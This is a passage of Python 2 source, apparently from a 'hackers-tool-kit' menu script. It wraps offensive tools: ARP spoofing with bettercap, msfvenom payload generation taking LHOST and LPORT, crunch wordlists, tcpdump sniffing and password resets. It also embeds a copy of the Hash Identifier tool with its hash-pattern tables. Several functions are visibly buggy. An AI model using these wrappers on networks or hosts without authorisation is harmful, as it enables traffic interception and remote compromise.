{0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + 